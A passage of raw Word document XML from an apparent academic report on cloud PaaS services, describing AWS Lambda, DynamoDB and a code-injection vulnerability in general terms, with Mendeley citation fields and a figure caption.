        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"http://www.ciscopress.com/articles/article.asp?p=2158215&amp;seqNum=6","abstract":"LAN and WAN","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"ciscopress.com","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ciscopress.com","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"page":"1","title":"LANs, WANs, and the Internet (1.3) &amp;gt; Exploring the Modern Computer Network: Types, Functions, and Hardware","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=bb2c5328-8906-31b3-8b29-e2cbe0c8b4c1"]}],"mendeley":{"formattedCitation":"[5]","plainTextFormattedCitation":"[5]","previouslyFormattedCitation":"[5]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i.e. the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4115" w14:textId="108C9B2D" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Website developers </w:t>
      </w:r>
      <w:r w:rsidR="004A61A3">
        <w:t>predominantly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utilises a </w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t>Platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a Service (PaaS)</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/s12599-011-0183-3","ISBN":"9781597497251","ISSN":"18670202","abstract":"PaaS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author":[{"dropping-particle":"","family":"Beimborn","given":"Daniel","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Miletzki","given":"Thomas","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wenzel","given":"Stefan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Business and Information Systems Engineering","id":"ITEM-1","issue":"6","issued":{"date-parts":[["2011"]]},"page":"381-384","title":"Platform as a service (PaaS)","type":"article-journal","volume":"3"},"uris":["http://www.mendeley.com/documents/?uuid=2de8bf87-888c-4cc5-9129-305b8eb1e124"]}],"mendeley":{"formattedCitation":"[6]","plainTextFormattedCitation":"[6]","previouslyFormattedCitation":"[6]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t>Cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Service Model (CSM) to</w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t xml:space="preserve"> develop and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deploy their application and/or network services</w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t xml:space="preserve"> from a CSP datacentre</w:t>
      </w:r>
      <w:r>
        <w:t>, utilise either a Restful – Application Programmable Interface (Restful-API) or a Slack-API</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">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approach.","author":[{"dropping-particle":"","family":"Mark","given":"Massé","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Journal of Chemical Information and Modeling","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"title":"REST API Design Rulebook","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=eac915cc-0095-44e7-8cf8-4714210f21be"]}],"mendeley":{"formattedCitation":"[7]","plainTextFormattedCitation":"[7]","previouslyFormattedCitation":"[7]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via a </w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r>
        <w:t>website browser at the CSP application layer</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.14445/22312803/ijctt-v7p151","abstract":"A reference model is a conceptual blueprint of how communication should take place. It addresses all the process required for effective communication and divides these processes into logical grouping called layers. When a communication system is designed in this manner, it is known as layered architecture. The OSI isn't a physical model, though. Rather, it's a set of guidelines that application developers used to create and implement application that run on a network. It also provides a framework for creating and implementing networking standards, devices, and internetworking schemes. This paper explains the OSI Reference Model, which comprises of seven different layers. Each layer is having its own responsibilities.","author":[{"dropping-particle":"","family":"Bora","given":"Gaurav","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bora","given":"Saurabh","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Singh","given":"Shivendra","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Arsalan","given":"Sheikh Mohamad","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Computer Trends and Technology","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"OSI Reference Model: An Overview","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=b760f284-fd7e-4cc7-b249-0fd022bfbda7"]}],"mendeley":{"formattedCitation":"[8]","plainTextFormattedCitation":"[8]","previouslyFormattedCitation":"[8]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to interface with the underlying </w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t xml:space="preserve">datacentre </w:t>
      </w:r>
      <w:r>
        <w:t>network infrastructure such as; servers, routers, switches, Storage Area Network (SAN)</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://docs.broadcom.com/docs/12380347","abstract":"SAN design","accessed":{"date-parts":[["2019","1","22"]]},"author":[{"dropping-particle":"","family":"Broadcom","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"broadcom.com","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"SAN Design and Best Practices (1857 KB)","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=7fe3fef7-3d33-3ff7-a818-853915582682"]}],"mendeley":{"formattedCitation":"[9]","plainTextFormattedCitation":"[9]","previouslyFormattedCitation":"[9]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and hardware firewalls </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"http://www.zonealarm.com/firewall-blog/blog/difference-hardware-software-firewalls/","abstract":"What Is the Difference between Hardware and Software Firewalls?","accessed":{"date-parts":[["2017","12","11"]]},"author":[{"dropping-particle":"","family":"ZoneAlarm SEcurity","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"zonealarm.com","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"page":"1","title":"What Is the Difference between Hardware and Software Firewalls? |Firewall Internet Security Tips","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=e7d4ce98-8a83-3cbb-93b0-54a7ff977b7d"]}],"mendeley":{"formattedCitation":"[10]","plainTextFormattedCitation":"[10]","previouslyFormattedCitation":"[10]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that are configured and maintained by cloud engineers employed by a CSP.</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Data_Center/DC_Infra2_5/DCInfra_1.html","abstract":"datacentre","accessed":{"date-parts":[["2019","4","30"]]},"author":[{"dropping-particle":"","family":"Cisco","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"cisco.com","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"page":"1","title":"Data Center Architecture Overview - Cisco","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=ecd50f6b-a960-3577-8264-914842fb8fc8"]}],"mendeley":{"formattedCitation":"[11]","plainTextFormattedCitation":"[11]","previouslyFormattedCitation":"[11]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0DDAB" w14:textId="1878F85B" w:rsidR="00BD4A60" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A CSP Hyper Text Transport Protocol (HTTP) </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1201/9781351029902-4","abstract":"The textile-based method of manufacturing waterproof fabrics, which are nonetheless permeable to perspiration, has been in use for 50 years, and involves weaving a microfibre-based cellulosic fabric, the fibres of which swell up if they come into contact with water, thus blocking any more water passing through. Various chemical methods of producing such an effect have been developed. W.L. Gore, an American firm has developed the Goretex treatment, combining a PTFE membrane and a microporous coating. Other membrane plus coating treatments on the market are Stan-Air from Pennel &amp; Flipo, Sympatex from Akzo, Atochem's Pebax and Porex by PTL.","author":[{"dropping-particle":"","family":"Kumar","given":"Akshi","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kumar","given":"Akshi","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Web Technology","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"Hypertext Transfer Protocol (HTTP)","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=d480e5c6-a272-4ee7-a68a-0047966f73ee"]}],"mendeley":{"formattedCitation":"[12]","plainTextFormattedCitation":"[12]","previouslyFormattedCitation":"[12]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>website API utilises ‘Lambda’ functions to interface with the underlying network infrastructure hardware along with the backend database applications such as; ‘DynamoDB’, although this method is very efficient and effective, network security researchers have highlighted various security vulnerabilities with the use of lambda function calls that are generated by the API that are utilised at the CSP front end</w:t>
      </w:r>
      <w:r w:rsidR="00A95E87">
        <w:t xml:space="preserve"> of a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t xml:space="preserve"> to interface with a backend database</w:t>
      </w:r>
      <w:r w:rsidR="00060ABD">
        <w:t xml:space="preserve"> illustrated in </w:t>
      </w:r>
      <w:r w:rsidR="00060ABD" w:rsidRPr="00060ABD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00AB3BA4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003D00BA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Build scalable, reliable, and cost-effective applications with a serverless architectureAbout This Book* Design a real-world serverless application from scratch* Learn about AWS Lambda function and how to use Lambda functions to glue other AWS Services* Use the Java programming language and well-known design patterns. Although Java is used for the examples in this book, the concept is applicable across all languages* Learn to migrate your JAX-RS application to AWS Lambda and API GatewayWho This Book Is ForThis book is for developers and software architects who are interested in designing on the back end. Since the book uses Java to teach concepts, knowledge of Java is required. What You Will Learn* Learn to form microservices from bigger Softwares* Orchestrate and scale microservices* Design and set up the data flow between cloud services and custom business logic* Get to grips with cloud provider's APIs, limitations, and known issues* Migrate existing Java applications to a serverless architecture* Acquire deployment strategies* Build a highly available and scalable data persistence layer* Unravel cost optimization techniquesIn DetailOver the past years, all kind of companies from start-ups to giant enterprises started their move to public cloud providers in order to save their costs and reduce the operation effort needed to keep their shops open. Now it is even possible to craft a complex software system consisting of many independent micro-functions that will run only when they are needed without needing to maintain individual servers. The focus of this book is to design serverless architectures, and weigh the advantages and disadvantages of this approach, along with decision factors to consider. You will learn how to design a serverless application, get to know that key points of services that serverless applications are based on, and known issues and solutions. The book addresses key challenges such as how to slice out the core functionality of the software to be distributed in different cloud services and cloud functions. It covers basic and advanced usage of these services, testing and securing the serverless software, automating deployment, and more. By the end of the book, you will be equipped with knowledge of new tools and techniques to keep up with this evolution in the IT industry. Style and approachThe book takes a pragmatic approach, showing you all the examples you need to build efficient serverless applications. Cover; Copyright; Credit…","author":[{"dropping-particle":"","family":"Gurturk","given":"Cagatay","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Building Serverless Architectures: Learn the intricacies and nuances of building efficient serverless architectures","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Building Serverless Architectures","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=675d409d-7711-4665-a55e-a11f20cf6f2a"]}],"mendeley":{"formattedCitation":"[13]","plainTextFormattedCitation":"[13]","previouslyFormattedCitation":"[13]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00153E43" w:rsidRPr="00153E43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r w:rsidR="00153E43">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003D00BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D00BA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/j.ijhcs.2006.06.002","ISBN":"9780984442508","abstract":"When Mandy Brown, Jason Santa Maria and I formed A Book Apart, one topic burned uppermost in our minds, and there was only one author for the job. Nothing else, not even real fonts or CSS3, has stirred the standards-based design community like the imminent arrival of HTML5. Born out of dissatisfaction with the pacing and politics of the W3C, and conceived for a web of applications (not just documents), this new edition of the webs lingua franca has in equal measure excited, angered, and confused the web design community. Just as he did with the DOM and JavaScript, Jeremy Keith has a unique ability to illuminate HTML5 and cut straight to what matters to accessible, standards-based designer-developers. And he does it in this book, using only as many words and pictures as are needed. There are other books about HTML5, and there will be many more. There will be 500 page technical books for application developers, whose needs drove much of HTML5s develop- ment. There will be even longer secret books for browser makers, addressing technical challenges that you and I are blessed never to need to think about. But this is a book for youyou who create web content, who mark up web pages for sense and semantics, and who design accessible interfaces and experiences. Call it your user guide to HTML5. Its goalone it will share with every title in the forthcoming A Book Apart catalogis to shed clear light on a tricky subject, and do it fast, so you can get back to work.","author":[{"dropping-particle":"","family":"Keith","given":"Jeremy","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Design","id":"ITEM-1","issued":{"date-parts":[["2010"]]},"title":"HTML5 for web designers","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=aa108966-0b09-416e-8e5e-bac45aafee92"]}],"mendeley":{"formattedCitation":"[14]","plainTextFormattedCitation":"[14]","previouslyFormattedCitation":"[14]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="003D00BA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003D00BA" w:rsidRPr="003D00BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r w:rsidR="003D00BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4265BA20" w14:textId="77777777" w:rsidR="00060ABD" w:rsidRDefault="00060ABD" w:rsidP="00060ABD">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF8FD93" wp14:editId="5CB26506">
            <wp:extent cx="5730875" cy="3284855"/>
            <wp:effectExtent l="19050" t="19050" r="22225"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84855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DC75E0" w14:textId="659DF375" w:rsidR="00060ABD" w:rsidRPr="00060ABD" w:rsidRDefault="00060ABD" w:rsidP="00060ABD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc40134066"/>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: AWS DynamoDB Lambda Function Call Code Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/1323293.1294281","ISBN":"9781595935915","ISSN":"01635980","PMID":"18197987","abstract":"joints à l'article : comptes rendus d'ouvrage consacrés à Aristophane (RPh, 38, 1964, p. 128-131)","author":[{"dropping-particle":"","family":"Amazon","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Sosp","id":"ITEM-1","issued":{"date-parts":[["2007"]]},"title":"Amazon Dynamo DB","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=66461013-b114-432d-8ff5-41bc79e8362a"]},{"id":"ITEM-2","itemData":{"URL":"https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"AWS","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"docs.aws.amazon.com","id":"ITEM-2","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Best Practices for Working with AWS Lambda Functions - AWS Lambda","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=04702997-b803-38d0-8c05-6e17104a788e"]}],"mendeley":{"formattedCitation":"[15], [16]","plainTextFormattedCitation":"[15], [16]","previouslyFormattedCitation":"[15], [16]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00060ABD">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[15], [16]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4116" w14:textId="43721F29" w:rsidR="00C5650F" w:rsidRDefault="00AB3BA4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This vulnerability can be </w:t>
      </w:r>
      <w:r w:rsidR="00BD4A60">
        <w:t>exploited by</w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>utilising</w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t>code event injection</w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003C50CE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1145/3133956.3134091","abstract":"Cross-Site Scripting (XSS) is an unremitting problem for the Web. Since its initial public documentation in 2000 until now, XSS has been continuously on top of the vulnerability statistics. Even though there has been a considerable amount of research and developer education to address XSS on the source code level, the overall number of discovered XSS problems remains high. Because of this, various approaches to mitigate XSS have been proposed as a second line of defense, with HTML sanitizers, Web Application Firewalls, browser-based XSS filters, and the Content Security Policy being some prominent examples. Most of these mechanisms focus on script tags and event handlers, either by removing them from user-provided content or by preventing their script code from executing. In this paper, we demonstrate that this approach is no longer sufficient for modern applications: We describe a novel Web attack that can circumvent all of theses currently existing XSS mitigation techniques. In this attack, the attacker abuses so called script gadgets (legitimate JavaScript fragments within an application's legitimate code base) to execute JavaScript. In most cases, these gadgets utilize DOM selectors to interact with elements in the Web document. Through an initial injection point, the attacker can inject benign-looking HTML elements which are ignored by these mitigation techniques but match the selector of the gadget. This way, the attacker can hijack the input of a gadget and cause processing of his input, which in turn leads to code execution of attacker-controlled values. We demonstrate that these gadgets are omnipresent in almost all modern JavaScript frameworks and present an empirical study showing the prevalence of script gadgets in productive code. As a result, we assume most mitigation techniques in web applications written today can be bypassed.","author":[{"dropping-particle":"","family":"Lekies","given":"Sebastian","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kotowicz","given":"Krzysztof","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Groß","given":"Samuel","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vela Nava","given":"Eduardo A.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Johns","given":"Martin","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Code-Reuse Attacks for the Web","type":"paper-conference"},"uris":["http://www.mendeley.com/documents/?uuid=a1ccda92-b2db-4c65-9a66-f999e02172e9"]}],"mendeley":{"formattedCitation":"[17]","plainTextFormattedCitation":"[17]","previouslyFormattedCitation":"[17]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00801096">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00060ABD" w:rsidRPr="00060ABD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
